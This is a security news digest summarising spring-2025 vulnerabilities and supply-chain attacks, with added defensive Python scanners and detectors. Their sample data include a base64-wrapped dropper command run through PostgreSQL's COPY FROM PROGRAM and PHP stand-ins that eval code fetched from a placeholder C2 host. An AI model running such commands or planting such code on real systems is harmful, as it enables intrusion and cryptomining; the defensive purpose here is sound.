Programmer’s Digest #129

04/02/2025-04/09/2025 Flaw in Apache Parquet, CrushFTP Vulnerability, Malicious Python Packages And More.

1. Critical Flaw in Apache Parquet Allows Remote Attackers to Execute Arbitrary Code

A critical vulnerability (CVE-2025-30065) in Apache Parquet’s Java library can lead to remote code execution. The flaw carries the maximum CVSS score of 10.0, affects versions 1.15.0 and earlier, and is fixed in version 1.15.1.

According to the project maintainers, the issue lies in schema parsing within the parquet-avro module. Endor Labs warns that an attacker exploits it by getting a target to process a specially crafted Parquet file, which makes it most dangerous for data pipelines, ingestion endpoints and analytics platforms that accept files from outside the organization. No active exploitation has been reported, but vulnerabilities in widely deployed Apache projects draw attacker interest quickly. Keyi Li of Amazon reported the flaw.

Separately, CVE-2025-24813 in Apache Tomcat was exploited within 30 hours of disclosure. Aqua Security also found a campaign against Tomcat servers that used weak credentials to deploy Java-based web shells, steal SSH keys and hijack resources for crypto mining. Taken together, the two cases make the argument for patching Apache components on a short clock.

2. CISA Adds CrushFTP Vulnerability to KEV Catalog Following Confirmed Active Exploitation

CISA has added a critical CrushFTP vulnerability (CVE-2025-31161, CVSS 9.8) to its Known Exploited Vulnerabilities catalog after confirming active exploitation. The flaw is an authentication bypass that lets a remote attacker act as any known or guessable user account, which can lead to full system compromise. It is patched in versions 10.8.4 and 11.3.1.

Disclosure was messy. The issue was initially tracked as CVE-2025-2825, an identifier VulnCheck published without coordinating with the vendor or the discloser, Outpost24; MITRE later assigned the official CVE. VulnCheck accused CrushFTP of delaying disclosure and criticized MITRE’s process.

Huntress confirmed exploitation in the wild as early as March 30, 2025. Attackers installed remote access tools such as AnyDesk and MeshAgent, added admin users, and deployed malware that reported to a Telegram bot. At least four organizations across the marketing, retail and semiconductor sectors have been hit.

3. Malicious Python Packages Attacking Popular Cryptocurrency Library

Cybersecurity experts have uncovered a new threat targeting cryptocurrency developers and users. Two malicious Python packages—bitcoinlibdbfix and bitcoinlib-dev—were found on PyPI, posing as fixes for the widely used bitcoinlib library.

Once installed, the packages target bitcoinlib’s command-line interface: they remove the legitimate clw wallet tool and replace it with a malicious version that intercepts the user’s commands and sends private wallet data to attacker-controlled servers.

The bitcoinlib library is a key resource for developers building blockchain applications, which makes anything posing as a fix for it a credible lure. ReversingLabs discovered the campaign with its Spectra platform, which uses machine learning to flag suspicious package behavior.

This attack is part of a broader trend of supply chain compromises in the crypto space, with nearly two dozen incidents reported in 2024 alone. The attackers used social engineering, claiming their packages fixed a database error to trick developers into installing the malware.
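Both malicious packages embed the name of the library they impersonate, which is the simplest signal a pre-install gate can check. The following is an added example, not code from the original post, from ReversingLabs or from bitcoinlib: it normalizes PyPI names the way the index does and holds any requested name that embeds or closely resembles a package you rely on. The requirements list is constructed.

```python
"""Lookalike-name gate for a requirements list, modelled on the bitcoinlib case above.

Added example (not from the original post or from ReversingLabs/bitcoinlib):
flags requested PyPI names that embed or closely resemble a package you rely on.
"""
import difflib
import re


def normalize(name: str) -> str:
    # PEP 503 normalization: case-fold, collapse runs of "-", "_" and "." into one dash
    return re.sub(r"[-_.]+", "-", name).lower()


def similarity(candidate: str, protected: str) -> float:
    return difflib.SequenceMatcher(None, normalize(candidate), normalize(protected)).ratio()


def is_lookalike(candidate: str, protected: str, threshold: float = 0.85) -> bool:
    cand, prot = normalize(candidate), normalize(protected)
    if cand == prot:
        return False                      # the genuine package
    if prot in cand:
        return True                       # "bitcoinlib-dev", "bitcoinlibdbfix" embed the real name
    return similarity(cand, prot) >= threshold  # single-character typos such as "bitcoinlb"


def gate_install(requested, protected):
    """Return (requested_name, protected_name, reason) for every name to hold for review."""
    hits = []
    for name in requested:
        for prot in protected:
            if is_lookalike(name, prot):
                reason = ("embeds protected name" if normalize(prot) in normalize(name)
                          else "near-identical spelling")
                hits.append((name, prot, reason))
    return hits


# Constructed requirements list: two real lures from the campaign plus a typo and two benign names
CONSTRUCTED_REQUIREMENTS = ["requests", "bitcoinlib", "bitcoinlibdbfix", "bitcoinlib-dev", "bitcoinlb"]

if __name__ == "__main__":
    for name, prot, reason in gate_install(CONSTRUCTED_REQUIREMENTS, ["bitcoinlib"]):
        print(f"HOLD {name}: {reason} ({prot})")
```

The containment rule is deliberately strict because a legitimate fix never ships as a separate package with the upstream name glued to a suffix; a real fix is a new release of bitcoinlib itself. Lower the similarity threshold only for packages whose names are long enough that a single-character edit is unlikely to collide with an unrelated project.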

4. CISA Urges Patching For ‘Critical’ Ivanti VPN Flaw

A critical vulnerability (CVE-2025-22457) in Ivanti’s Connect Secure VPN is being actively exploited and must be patched immediately, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned.

The flaw allows remote code execution and has been linked to UNC5221, a suspected China-based espionage group responsible for earlier mass attacks on Ivanti VPNs in 2024. Mandiant researchers observed malware deployments and signs of exploitation dating back to mid-March.

The vulnerability, a stack-based buffer overflow, affects Ivanti Connect Secure versions 22.7R2.5 and earlier and the unsupported Pulse Connect Secure 9.1x line. Ivanti shipped the fix (version 22.7R2.6) on February 11 but initially classified the issue as a minor bug, so many customers had no reason to prioritize it.

CISA added the flaw to its Known Exploited Vulnerabilities catalog and urged all organizations, not just federal agencies, to update. Ivanti said its Integrity Checker Tool (ICT) helped customers detect compromises and stressed that appliances on supported versions with the recommended configuration are at lower risk. Upgrade immediately, run the ICT, and treat any appliance that shows signs of tampering as compromised rather than simply patching it in place.

5. Microsoft Patches 126 Flaws Including Actively Exploited Windows CLFS Vulnerability

Microsoft has released patches for 126 security flaws, including one actively exploited vulnerability (CVE-2025-29824) in the Windows Common Log File System (CLFS) driver. This elevation of privilege (EoP) bug lets an attacker who already has local access reach SYSTEM via a use-after-free condition. It has a CVSS score of 7.8 and has been linked to ransomware attacks. Notably, at the time of release no patch was available for Windows 10 (32-bit and 64-bit), leaving those systems exposed.

Of the 126 flaws, 11 are Critical and 112 Important, covering privilege escalation, remote code execution, and denial-of-service issues. Other key fixes include RCE flaws in Windows Remote Desktop, Kerberos, Office, Excel, TCP/IP, and Hyper-V.

CISA added CVE-2025-29824 to its Known Exploited Vulnerabilities list, requiring federal agencies to patch by April 29, 2025.

Microsoft’s updates follow fixes from other major vendors, including Apple, Adobe, Cisco, Google, VMware, Fortinet, and more, addressing a wide range of vulnerabilities across platforms.

1 mo   digest   programmers'

Programmer’s Digest #128

03/26/2025-04/02/2025 Over 1,500 PostgreSQL Servers Compromised, New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor And More.

1. Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign

An ongoing campaign targets exposed PostgreSQL instances to deploy cryptocurrency miners; more than 1,500 victims have been reported. The attackers use PG_MEM malware and lean on defense evasion: fileless miner payloads and a unique binary hash for every target, so hash-based detection never matches twice.

The campaign exploits weak PostgreSQL configurations, above all instances reachable from the internet with weak or default superuser passwords, and uses COPY ... FROM PROGRAM to run arbitrary shell commands as the database server’s OS user. That statement is available only to superusers and members of the pg_execute_server_program role, so a superuser login on an exposed instance is effectively a shell on the host. The attackers run a Base64-encoded shell script that kills competing miners and drops PG_CORE together with an obfuscated Golang binary named postmaster, chosen to blend in with the genuine PostgreSQL process of that name. The binary creates a cron job for persistence, escalates privileges, and downloads the XMRig miner. Each compromised machine is registered as its own mining worker; the campaign reportedly runs more than 1,500 machines across multiple wallets.
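Because the whole chain starts with a single SQL statement, it shows up in the server log once statement logging is on. The following is an added example, not code from the original post or from Wiz: a scanner that pulls COPY ... FROM/TO PROGRAM statements out of PostgreSQL log lines, recovers the program string, and unwraps any base64 blob inside it so the hidden script can be read. The log lines are constructed to match log_line_prefix = '%m [%p] %u@%d ' with log_statement = 'all'; the hostname in the payload is a placeholder.

```python
"""Flag COPY ... FROM/TO PROGRAM in PostgreSQL statement logs and unwrap base64 payloads.

Added example, not code from the original post or from Wiz; the log lines are constructed
to match log_line_prefix = '%m [%p] %u@%d ' with log_statement = 'all'.
"""
import base64
import re

# COPY <table> FROM|TO PROGRAM '<command>'; PostgreSQL doubles single quotes inside literals
COPY_PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\s+'((?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)
ROLE_RE = re.compile(r"\[\d+\]\s+(\S+@\S+)\s+LOG:")
# a base64 run long enough to be a payload rather than an identifier
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_embedded_base64(command: str):
    """Return the printable plaintexts of any base64 blobs embedded in a shell command."""
    decoded = []
    for blob in B64_RE.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def scan_postgres_log(lines):
    """Return one finding per statement that hands a shell command to the server process."""
    findings = []
    for line in lines:
        m = COPY_PROGRAM_RE.search(line)
        if not m:
            continue
        command = m.group(2).replace("''", "'")
        role = ROLE_RE.search(line)
        findings.append({
            "direction": m.group(1).upper(),
            "role": role.group(1) if role else None,
            "command": command,
            "decoded": decode_embedded_base64(command),
        })
    return findings


# Constructed attacker command, base64-wrapped the way the campaign's dropper hides its script
SAMPLE_PAYLOAD = ("pkill -f xmrig; curl -s http://dropper.example.invalid/postmaster "
                  "-o /tmp/postmaster; chmod +x /tmp/postmaster")
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_LOG = [
    "2025-03-28 10:15:21.001 UTC [4120] app@orders LOG:  statement: SELECT id FROM orders WHERE status = 'open'",
    "2025-03-28 10:15:22.412 UTC [4133] postgres@postgres LOG:  statement: COPY tmp_exec FROM PROGRAM 'echo "
    + SAMPLE_B64 + " | base64 -d | sh'",
    "2025-03-28 10:15:22.890 UTC [4133] postgres@postgres LOG:  statement: DROP TABLE tmp_exec",
    "2025-03-28 10:16:01.004 UTC [4140] etl@warehouse LOG:  statement: copy staging to program 'gzip > /tmp/out.gz'",
]

if __name__ == "__main__":
    for f in scan_postgres_log(SAMPLE_LOG):
        print(f["role"], f["direction"], "PROGRAM", f["command"][:60], f["decoded"])
```

The second hit (an ETL role piping a COPY into gzip) is the kind of legitimate use that keeps this from being a blanket block rule; the triage question is which roles are allowed to reach the OS at all. On the prevention side, revoke pg_execute_server_program from anything that is not a deliberately provisioned admin role, do not expose port 5432 to the internet, and give the superuser a real password.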

2. New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth

Cybersecurity researchers have found an updated version of Hijack Loader, a malware loader first seen in 2023 that delivers second-stage payloads such as information stealers and is built to get past security software. The new build adds call stack spoofing, which fabricates stack frames so that the origin of a suspicious API call looks benign to inspection tools, and anti-VM checks for sandbox detection.

It also integrates the Heaven’s Gate technique for process injection and delays execution based on a blocklist of Avast Antivirus processes. Two new modules, ANTIVM and modTask, handle detection evasion and persistence through scheduled tasks.

Meanwhile, Elastic Security Labs revealed a new malware family, SHELBY, that uses GitHub for command-and-control and data exfiltration. The loader communicates through commits to a private repository, so the operators can issue commands and collect data while the traffic blends in with ordinary GitHub use.

3. Hackers Abuse WordPress MU-Plugins to Hide Malicious Code

Attackers are increasingly using the WordPress mu-plugins (“must-use plugins”) directory to run malicious code on every page load. Any PHP file placed in wp-content/mu-plugins/ is loaded automatically on every request, needs no activation from the admin dashboard and cannot be deactivated there, which makes it a convenient hiding place.

Mu-plugins have legitimate uses, but that automatic execution is exactly what makes them attractive for stealthy attacks. Sucuri identified three payloads:

  1. redirect.php – Redirects users to a fake browser update site to download malware.
  2. index.php – A webshell that fetches and executes PHP code remotely.
  3. custom-js-loader.php – Injects malicious JavaScript to hijack images and links.

These attacks can steal credentials, damage a site’s reputation, and push malware to visitors. To prevent infections, Sucuri advises keeping plugins updated, removing unnecessary ones, and using strong passwords with multi-factor authentication. The mu-plugins directory is also worth auditing directly, since its contents appear only under the Must-Use tab of the Plugins screen and never in the list of active plugins.
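Each of the three payloads has a trait a file scanner can key on: an off-site redirect, a remote fetch feeding eval, and an injected third-party script tag. The following is an added example, not code from the original post or from Sucuri: a scanner over a mu-plugins directory with generic indicators for those traits. The sample PHP files are constructed stand-ins and the hostnames are placeholders; the signatures will also fire on some legitimate code, so treat hits as a review queue rather than a verdict.

```python
"""Scan a wp-content/mu-plugins directory for the traits of the three drop-ins described above.

Added example, not code from the original post or from Sucuri. The sample files are
constructed; the signatures are generic indicators and will also fire on some legitimate code.
"""
import re
import tempfile
from pathlib import Path

SIGNATURES = [
    ("remote_fetch", re.compile(r"\b(file_get_contents|curl_exec|fopen)\s*\(\s*['\"]https?://", re.I)),
    ("dynamic_eval", re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)),
    ("encoded_payload", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("external_redirect", re.compile(r"\bheader\s*\(\s*['\"]Location:\s*https?://", re.I)),
    ("injected_script", re.compile(r"<script[^>]+src=['\"]https?://", re.I)),
    ("hex_obfuscation", re.compile(r"(\\x[0-9a-f]{2}){6,}", re.I)),
]


def scan_mu_plugins(mu_dir):
    """Return {relative_path: [signature labels]} for every PHP file that trips a signature.

    WordPress only auto-loads PHP files at the top level of mu-plugins, but a top-level
    loader can require_once anything below it, so subdirectories are scanned too.
    """
    root = Path(mu_dir)
    hits = {}
    for path in sorted(root.rglob("*.php")):
        try:
            source = path.read_text(errors="replace")
        except OSError:
            continue
        labels = [label for label, rx in SIGNATURES if rx.search(source)]
        if labels:
            hits[str(path.relative_to(root))] = labels
    return hits


# Constructed stand-ins for the three payload types plus one benign loader
SAMPLE_FILES = {
    "redirect.php": "<?php\nif (!is_admin()) { header('Location: https://update.example.invalid/browser.php'); exit; }\n",
    "index.php": "<?php\n$c = file_get_contents('https://c2.example.invalid/p.txt');\neval(base64_decode($c));\n",
    "custom-js-loader.php": "<?php\nadd_action('wp_footer', function () { echo '<script src=\"https://js.example.invalid/x.js\"></script>'; });\n",
    "legit-loader.php": "<?php\nrequire_once WPMU_PLUGIN_DIR . '/lib/loader/loader.php';\n",
}


def demo():
    """Write the constructed files into a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            Path(tmp, name).write_text(body)
        return scan_mu_plugins(tmp)


if __name__ == "__main__":
    for rel, labels in demo().items():
        print(rel, "->", ", ".join(labels))
```

Run it against the real directory with scan_mu_plugins("/var/www/html/wp-content/mu-plugins") from a cron job and alert on any new file as well as on any hit; on most sites that directory changes rarely enough that the file list itself is a useful baseline.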

4. Multiple npm Crypto Packages Hijacked

Sonatype has uncovered multiple hijacked npm cryptocurrency packages designed to steal sensitive information like API keys and SSH keys. These packages, some of which have been on npm for up to 9 years, were recently updated with malicious, obfuscated scripts.

The hijacked packages, tracked as sonatype-2025-000924, include scripts that exfiltrate sensitive data to a remote server after installation. Notably, some packages had not been updated in years, like “bnb-javascript-sdk-nobroadcast,” which received a malicious release.

Sonatype researchers suspect the hijacks may be the result of compromised npm maintainer accounts, possibly due to credential stuffing or expired domain takeovers. This incident highlights the importance of securing developer accounts with two-factor authentication (2FA) and improving supply chain security practices. Developers must remain vigilant in monitoring third-party software registries to mitigate risks associated with malicious updates in open-source packages.
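The tell in this incident is structural: a package dormant for years suddenly gets a release, from a different publisher, that adds an install-time script. All of that is visible in the registry metadata before anything is installed. The following is an added example, not code from the original post or from Sonatype, that scores consecutive releases on those three signals. The packument is constructed in the shape the npm registry returns (a time map plus per-version manifests with scripts and _npmUser); the package name is a placeholder, not a real package.

```python
"""Flag hijack-shaped releases in npm registry metadata: a publish after long dormancy that adds
install hooks or comes from a different publisher.

Added example, not from the original post or from Sonatype. The packument below is constructed
in the shape the registry returns (time map, per-version manifests with scripts and _npmUser).
"""
from datetime import datetime, timedelta

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def parse_ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def suspicious_releases(packument, dormancy_days=365):
    """Return [(version, [reasons])] for versions worth holding before they enter a build."""
    times = {v: parse_ts(t) for v, t in packument["time"].items() if v not in ("created", "modified")}
    ordered = sorted(times, key=times.get)
    findings = []
    for prev, cur in zip(ordered, ordered[1:]):
        prev_m, cur_m = packument["versions"][prev], packument["versions"][cur]
        reasons = []
        gap = times[cur] - times[prev]
        if gap >= timedelta(days=dormancy_days):
            reasons.append(f"published after {gap.days} days of dormancy")
        prev_scripts, cur_scripts = prev_m.get("scripts", {}), cur_m.get("scripts", {})
        changed_hooks = [h for h in INSTALL_HOOKS
                         if cur_scripts.get(h) and cur_scripts[h] != prev_scripts.get(h)]
        if changed_hooks:
            reasons.append("adds or changes install hooks: " + ", ".join(changed_hooks))
        prev_pub = prev_m.get("_npmUser", {}).get("name")
        cur_pub = cur_m.get("_npmUser", {}).get("name")
        if prev_pub and cur_pub and prev_pub != cur_pub:
            reasons.append(f"publisher changed {prev_pub} -> {cur_pub}")
        if reasons:
            findings.append((cur, reasons))
    return findings


# Constructed packument: two quiet releases in 2016, then a hijack-shaped release in 2025
SAMPLE_PACKUMENT = {
    "name": "example-chain-sdk",     # placeholder name, not a real package
    "time": {
        "created": "2016-05-01T12:00:00.000Z",
        "1.0.0": "2016-05-01T12:00:00.000Z",
        "1.1.0": "2016-11-01T09:30:00.000Z",
        "1.1.1": "2025-03-25T03:14:00.000Z",
        "modified": "2025-03-25T03:14:00.000Z",
    },
    "versions": {
        "1.0.0": {"scripts": {"test": "mocha"}, "_npmUser": {"name": "orig-maintainer"}},
        "1.1.0": {"scripts": {"test": "mocha"}, "_npmUser": {"name": "orig-maintainer"}},
        "1.1.1": {"scripts": {"test": "mocha", "postinstall": "node install.js"},
                  "_npmUser": {"name": "new-publisher"}},
    },
}

if __name__ == "__main__":
    for version, reasons in suspicious_releases(SAMPLE_PACKUMENT):
        print(version, "->", "; ".join(reasons))
```

A single signal on its own is noisy (maintainers do come back from long breaks), but two or three together on a package with a crypto wallet in its dependency tree is worth a hold. Independently of this check, running installs with --ignore-scripts and pinning with a lockfile removes the install hook as an execution vector altogether.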

5. RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

CISA has analyzed a new malware called RESURGE, deployed through a now-patched vulnerability in Ivanti Connect Secure (ICS) appliances. RESURGE shares features with the SPAWNCHIMERA malware but carries distinct commands that change its behavior, and it can act as a rootkit, dropper, backdoor, proxy and tunneler. The security flaw (CVE-2025-0282) affects several Ivanti products and allows remote code execution. It has been weaponized to deliver the SPAWN malware ecosystem, linked to the China-based espionage group UNC5337. SPAWNCHIMERA, the earlier variant, was observed patching the vulnerability on appliances it had already compromised.

RESURGE includes features like web shell deployment, credential harvesting, and manipulation of integrity checks. CISA also discovered two other malicious artifacts on compromised ICS devices. Organizations are urged to patch Ivanti systems, reset credentials, and monitor accounts for anomalous activity.


Programmer’s Digest #127

03/19/2025-03/26/2025 Update Next.js, Critical Ingress NGINX Controller Vulnerability, Authentication Bypass in VMware Windows Tools And More.

1. Warning For Developers, Web Admins: Update Next.js to Prevent Exploit

Developers using Next.js should install a security update for CVE-2025-29927, a critical authorization bypass that affects any application whose security checks live in the framework’s middleware. Next.js uses the x-middleware-subrequest header internally to stop middleware from re-running on its own subrequests; because the header was also trusted on external requests, an attacker can add it to a request and skip middleware entirely, bypassing whatever authentication, authorization or redirect logic it enforces and reaching routes, including admin routes, that middleware was supposed to protect. All Next.js versions from 11.1.4 onward are affected. Upgrade to 15.2.3 (for 15.x) or 14.2.25 (for 14.x).

Applications hosted on Vercel or Netlify, and those that do not use middleware, are unaffected. If patching is not possible, Vercel advises blocking external requests that carry the x-middleware-subrequest header at the proxy or WAF. Johannes Ullrich of the SANS Internet Storm Center noted that similar flaws, where an internal-only header is trusted from the outside, have appeared in other commercial tools.
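The workaround is a one-line rule at the edge: nothing outside the application should ever be allowed to set that header. The following is an added example, not code from the original post, from Vercel or from Next.js, written as a WSGI wrapper so it runs stand-alone; the same rule belongs in whatever reverse proxy or WAF fronts the app. The requests are constructed and the header value is arbitrary.

```python
"""Edge-side guard for the Next.js bypass: refuse or strip x-middleware-subrequest before it
reaches the application.

Added example, not from the original post, Vercel or Next.js. Shown as a WSGI wrapper so it
runs stand-alone; the same rule belongs in whatever reverse proxy or WAF fronts the app.
"""
HEADER_ENV_KEY = "HTTP_X_MIDDLEWARE_SUBREQUEST"   # WSGI spelling of the x-middleware-subrequest header


def guard_subrequest_header(app, reject=True):
    """Wrap a WSGI app: 400 any external request carrying the header, or drop it silently."""
    def wrapped(environ, start_response):
        if HEADER_ENV_KEY in environ:
            if reject:
                body = b"forbidden header\n"
                start_response("400 Bad Request",
                               [("Content-Type", "text/plain"), ("Content-Length", str(len(body)))])
                return [body]
            environ = {k: v for k, v in environ.items() if k != HEADER_ENV_KEY}
        return app(environ, start_response)
    return wrapped


def origin(environ, start_response):
    """Stand-in for the Next.js server: reports whether the header reached it."""
    seen = environ.get(HEADER_ENV_KEY, "<absent>")
    body = f"subrequest header: {seen}\n".encode()
    start_response("200 OK", [("Content-Type", "text/plain"), ("Content-Length", str(len(body)))])
    return [body]


def call(app, environ):
    """Minimal WSGI driver: returns (status, body) without a real server."""
    status = {}

    def start_response(st, headers, exc_info=None):
        status["value"] = st

    body = b"".join(app(environ, start_response))
    return status["value"], body


# Constructed requests: a normal one and one smuggling the header (the value is arbitrary here)
BENIGN = {"REQUEST_METHOD": "GET", "PATH_INFO": "/admin"}
HOSTILE = dict(BENIGN, HTTP_X_MIDDLEWARE_SUBREQUEST="x")


def demo():
    return {
        "benign": call(guard_subrequest_header(origin), BENIGN),
        "rejected": call(guard_subrequest_header(origin), HOSTILE),
        "stripped": call(guard_subrequest_header(origin, reject=False), HOSTILE),
        "unguarded": call(origin, HOSTILE),
    }


if __name__ == "__main__":
    for label, (status, body) in demo().items():
        print(f"{label:10} {status:16} {body.decode().strip()}")
```

Rejecting is the better default: no legitimate client sends this header, so a 400 costs nothing and gives you a log line for every probe. Stripping is the fallback when the proxy sits in front of several applications and a hard failure would be disruptive to investigate.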

2. Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication

Five vulnerabilities, collectively dubbed IngressNightmare, have been found in the Ingress NGINX Controller for Kubernetes, exposing more than 6,500 internet-reachable clusters to unauthenticated remote code execution. The most severe, CVE-2025-1974, carries a CVSS score of 9.8; chained together the flaws let an attacker read every secret in every namespace, which amounts to cluster takeover. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, CVE-2025-1974) sit in the admission controller, which validates incoming ingress objects, accepts connections without authentication, and is reachable over the pod network. By submitting a malicious ingress object, an attacker can inject arbitrary NGINX configuration directives that execute code inside the controller pod.

Cloud security firm Wiz, which found the flaws, warns that 43% of cloud environments are affected. The Kubernetes Security Response Committee has released fixes in Ingress NGINX Controller versions 1.12.1, 1.11.5, and 1.10.7.

Admins should update immediately. As a compensating control, make sure the admission webhook is reachable only from the Kubernetes API server (a NetworkPolicy on the controller namespace, and never a public Service), and if patching has to wait, the project’s guidance allows temporarily disabling the validating admission webhook component.
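Two of the preconditions above are visible in plain manifests: whether the admission webhook is published beyond ClusterIP, and whether ingress annotations carry values that could break out of the directive they are templated into. The following is an added example, not code from the original post, from Wiz or from the ingress-nginx project, that audits a list of Kubernetes objects for both. The admission Service name is the one the upstream deploy manifests use (an assumption; adjust for a Helm release name), and the objects are constructed.

```python
"""Audit Kubernetes objects for two IngressNightmare preconditions: an admission webhook
reachable beyond the API server, and nginx annotations whose values could break out of the
directive they are templated into.

Added example, not from the original post, Wiz or the ingress-nginx project. The Service name
is the one the upstream deploy manifests use (assumption); the objects are constructed.
"""
ADMISSION_SERVICE = "ingress-nginx-controller-admission"   # assumed default name
NGINX_PREFIX = "nginx.ingress.kubernetes.io/"
# inside an nginx config a newline, ';', '{', '}' or '#' ends or starts a directive or block
BREAKOUT_CHARS = ("\n", ";", "{", "}", "#")


def _ident(obj):
    md = obj.get("metadata", {})
    return f"{md.get('namespace', 'default')}/{md.get('name', '?')}"


def audit_admission_exposure(objects):
    """Flag the admission Service if it is anything other than ClusterIP."""
    findings = []
    for obj in objects:
        if obj.get("kind") != "Service" or obj.get("metadata", {}).get("name") != ADMISSION_SERVICE:
            continue
        svc_type = obj.get("spec", {}).get("type", "ClusterIP")
        if svc_type != "ClusterIP":
            findings.append(f"{_ident(obj)}: admission webhook published as Service type {svc_type}")
    return findings


def audit_ingress_annotations(objects):
    """Flag snippet annotations (raw nginx config) and non-snippet values with breakout characters."""
    findings = []
    for obj in objects:
        if obj.get("kind") != "Ingress":
            continue
        for key, value in (obj.get("metadata", {}).get("annotations") or {}).items():
            if not key.startswith(NGINX_PREFIX):
                continue
            if key.endswith("-snippet"):
                findings.append(f"{_ident(obj)}: raw nginx snippet via {key}")
            elif any(ch in str(value) for ch in BREAKOUT_CHARS):
                findings.append(f"{_ident(obj)}: {key} carries directive-breaking characters")
    return findings


# Constructed objects: an exposed admission Service, the (legitimately public) controller
# Service, one Ingress with a smuggled newline and a snippet, and one clean Ingress
SAMPLE_OBJECTS = [
    {"kind": "Service", "metadata": {"name": ADMISSION_SERVICE, "namespace": "ingress-nginx"},
     "spec": {"type": "LoadBalancer", "ports": [{"port": 443}]}},
    {"kind": "Service", "metadata": {"name": "ingress-nginx-controller", "namespace": "ingress-nginx"},
     "spec": {"type": "LoadBalancer"}},
    {"kind": "Ingress", "metadata": {"name": "shop", "namespace": "web", "annotations": {
        NGINX_PREFIX + "auth-url": "http://auth.example.invalid/check\nextra",
        NGINX_PREFIX + "server-snippet": "location /debug { return 200; }",
        NGINX_PREFIX + "rewrite-target": "/$1"}}},
    {"kind": "Ingress", "metadata": {"name": "docs", "namespace": "web", "annotations": {
        NGINX_PREFIX + "ssl-redirect": "true"}}},
]

if __name__ == "__main__":
    for line in audit_admission_exposure(SAMPLE_OBJECTS) + audit_ingress_annotations(SAMPLE_OBJECTS):
        print(line)
```

Feed it the output of kubectl get svc,ingress -A -o json (the items list) to run it for real. A ClusterIP admission Service is still reachable from every pod in the cluster, so the Service-type check only catches the worst case; a NetworkPolicy that admits only the API server closes the rest, and setting allow-snippet-annotations to "false" in the controller ConfigMap removes the raw-config path that the snippet finding points at.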

3. Broadcom Warns of Authentication Bypass in VMware Windows Tools

Broadcom released security updates to fix a high-severity authentication bypass flaw (CVE-2025-22230) in VMware Tools for Windows. This vulnerability, caused by improper access control, allows local attackers with low privileges to gain high privileges on vulnerable VMs. “A malicious actor with non-administrative privileges on a Windows guest VM may perform certain high-privilege operations,” VMware warned in a security advisory.

Earlier this month, Broadcom patched three VMware zero-days (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226) exploited in attacks. Shortly after, over 37,000 VMware ESXi instances were found exposed to CVE-2025-22224.

4. Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories’ CI/CD Secrets Exposed

A supply chain attack on the GitHub Action “tj-actions/changed-files” initially targeted Coinbase’s open-source project, agentkit, before expanding. The attacker compromised the GitHub Action to leak repository secrets, earning CVE-2025-30066 (CVSS 8.6).

Endor Labs found that 218 repositories exposed secrets, including credentials for DockerHub, npm and AWS and GitHub tokens. Another compromised GitHub Action, “reviewdog/action-setup” (CVE-2025-30154), gave the attackers the access they used to modify “tj-actions/changed-files”; they then repointed the action’s existing version tags at a malicious commit, so every workflow that referenced a tag pulled the payload without any change on its own side.

The attacker used obfuscation techniques, including dangling commits and throwaway accounts, to evade detection. GitHub found no evidence of a platform compromise, but the attack shows a deep understanding of CI/CD security.

Having first targeted Coinbase, the attacker appears to have pivoted to a broad campaign once Coinbase mitigated the threat. The motive remains unclear but is likely financial, possibly cryptocurrency theft. Coinbase has since remediated the attack.
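The reason retagged releases reached so many repositories is that most workflows reference actions by a mutable tag such as @v45. The following is an added example, not code from the original post, from Endor Labs or from GitHub: a check over workflow YAML that lists every uses: reference not pinned to a full commit SHA. The workflow text is constructed and the 40-hex SHA in it is a placeholder.

```python
"""Find GitHub Actions workflow steps whose `uses:` is a mutable tag or branch rather than a
full commit SHA, which is what let the retagged tj-actions/changed-files releases reach
unchanged workflows.

Added example, not from the original post, Endor Labs or GitHub. The workflow text is
constructed and the 40-hex SHA is a placeholder.
"""
import re

USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"\s#]+)", re.MULTILINE)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def audit_workflow(text):
    """Return (ref, problem) for each action reference that is not pinned to a full commit SHA."""
    findings = []
    for ref in USES_RE.findall(text):
        if ref.startswith(("./", "docker://")):
            continue                                   # local path or image: no Git tag to pin
        if "@" not in ref:
            findings.append((ref, "no ref at all"))
            continue
        version = ref.rpartition("@")[2]
        if not FULL_SHA_RE.match(version):
            findings.append((ref, f"mutable ref '{version}'; pin to a full commit SHA and keep the tag in a comment"))
    return findings


# Constructed workflow: two tag-pinned actions, one SHA-pinned (placeholder SHA), one local action
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: tj-actions/changed-files@v45
      - uses: reviewdog/action-setup@0000000000000000000000000000000000000000  # placeholder SHA
      - uses: ./.github/actions/local-lint
      - name: build
        run: make
"""

if __name__ == "__main__":
    for ref, problem in audit_workflow(SAMPLE_WORKFLOW):
        print(f"{ref}: {problem}")
```

A SHA pin turns a moved tag into a no-op for your pipeline: the commit you pinned does not change when someone rewrites v45. It does not help against an action that downloads code at run time from elsewhere, and it needs a bot such as Dependabot to bump the pins, which is the price of taking mutable references out of the build.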

5. CISA Adds NAKIVO Vulnerability to KEV Catalog Amid Active Exploitation

